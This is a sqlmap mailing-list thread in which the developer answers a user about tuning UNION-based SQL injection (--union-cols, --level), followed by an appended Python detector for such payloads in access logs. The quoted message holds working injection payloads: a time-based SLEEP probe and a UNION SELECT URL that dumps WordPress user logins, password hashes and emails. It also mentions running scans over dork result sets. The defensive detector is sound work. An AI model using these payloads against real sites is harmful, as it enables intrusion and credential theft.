hi.

have you tried either:
A) --union-cols=15-25
and/or
B) --level=3

?

default --level=1 test goes up to 10 columns in UNION injections (if
ORDER BY can't be exploited)

kr

On Wed, Aug 17, 2011 at 11:10 PM, This LittlePiggy
<thislittlepiggyhadroastb...@hotmail.com> wrote:
>  sqlmap/1.0-dev (r4351)
>  found this
>
> Place: GET
> Parameter: id
>     Type: AND/OR time-based blind
>     Title: MySQL > 5.0.11 AND time-based blind
>     Payload: id=155 AND SLEEP(5)
> ---
> against
> web application technology: Apache, PHP 5.2.8
> back-end DBMS: MySQL 5.0.11
> banner:    '5.0.77'
>
> but the exploit was agonizingly slow.
> testing each other individual technique --technique=BEUS  at default level
> and risk produced no positives
>
>
> mysqlat0r found what it terms, 'method get, with single parameter,
> 'numerical without comments' positive and could quickly catalog dbs and
> dump full tables
> here is an example of its exploit URL
> http://127.0.0.1/news/edumacation/salsandvinablals/2011/individittiual09.php?id=-666%20UNION%20ALL%20SELECT%20null,
> concat(0x585858535441525444554D50585858,ID,0x7C7C7C,
> user_login,0x7C7C7C,user_pass,0x7C7C7C,user_nicename,0x7C7C7C,user_email,
> 0x7C7C7C,user_url,0x7C7C7C,user_registered,0x7C7C7C,user_activation_key,0x7C7C7C,
> user_status,0x7C7C7C,display_name,0x7C7C7C,0x585858454E4444554D50585858),
> null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20redridinghood_OSyummy2k11.wp_users%20LIMIT%200,10&
>
> full source for mysqlat0r available here
> http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
>
>
> my previous experience has been that mysqlat0r only is able to exploit what
> it claims to have found about 10% of the time.
>
>
> it would be nice if sqlmap would continue to test the other techniques even
> after finding a positive, and show you a list of available positives
> in subsequent passes, as some are much faster, or have better features.
>  particularly when processing a dork resultset.
>
> I have seen it ask if I want to continue after a positive, but it doesn't
> seem to actually attempt each of the other techniques, but just skipped to
> the next result set item. I'll retest that.
> I have been able to force it with the BEUST flags, and select the preferred
> one at runtime, but the UI for doing so is a little clumsy.
> ------------------------------------------------------------------------------
> Get a FREE DOWNLOAD! and learn more about uberSVN rich system,
> user administration capabilities and model configuration. Take
> the hassle out of deploying and managing Subversion and the
> tools developers use with it. http://p.sf.net/sfu/wandisco-d2d-2
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
-- 
Miroslav Stampar (@stamparm)

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
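Seen from the defender's side, the two payload shapes quoted in the thread (the `AND SLEEP(5)` time-based probe and a `UNION ALL SELECT` padded with nulls to the column count that `--union-cols` tunes) are easy to pick out of a web server access log. The following is an added example, not code from this thread or from sqlmap; the log lines are constructed, and the path and table names are placeholders.

```python
import re
from urllib.parse import quote, unquote_plus

def _log_line(ts, query):
    """Build one Apache-style access-log line (constructed sample data)."""
    return (f'127.0.0.1 - - [{ts}] "GET /news/individittiual09.php?id='
            f'{quote(query, safe="(),=")} HTTP/1.1" 200 3100')

# Constructed sample log: the same two payload shapes quoted in the thread
# (22-column UNION ALL SELECT with nulls, and AND SLEEP(5)) plus one benign request.
UNION_PAYLOAD = ("-666 UNION ALL SELECT null,concat(0x585858,user_login,0x7C7C7C,user_pass),"
                 + ",".join(["null"] * 20) + " FROM wp_users LIMIT 0,10")
SAMPLE_LOG = "\n".join([
    _log_line("17/Aug/2011:23:10:01 +0200", UNION_PAYLOAD),
    _log_line("17/Aug/2011:23:10:07 +0200", "155 AND SLEEP(5)"),
    _log_line("17/Aug/2011:23:10:09 +0200", "155"),
])
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
SLEEP_RE = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)

def count_columns(select_list):
    """Count top-level comma-separated expressions; commas inside parentheses do not split."""
    depth, cols = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            cols += 1
    return cols

def classify(line):
    """Return finding labels for one access-log line; an empty list means nothing suspicious."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = unquote_plus(m.group(1))  # decode %20 etc. before matching
    findings = []
    um = UNION_RE.search(target)
    if um:
        select_list = re.split(r"\bFROM\b", target[um.end():], flags=re.I)[0]
        findings.append(f"union-select:{count_columns(select_list)}-columns")
    if SLEEP_RE.search(target):
        findings.append("time-based-blind")
    return findings

def scan(log_text):
    """Return (line number, findings) for every suspicious line in the log text."""
    return [(n, f) for n, line in enumerate(log_text.splitlines(), 1) for f in [classify(line)] if f]
```

The reported column count is the number the injected SELECT had to match, which is the same figure an operator would otherwise have to guess with `--union-cols`.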

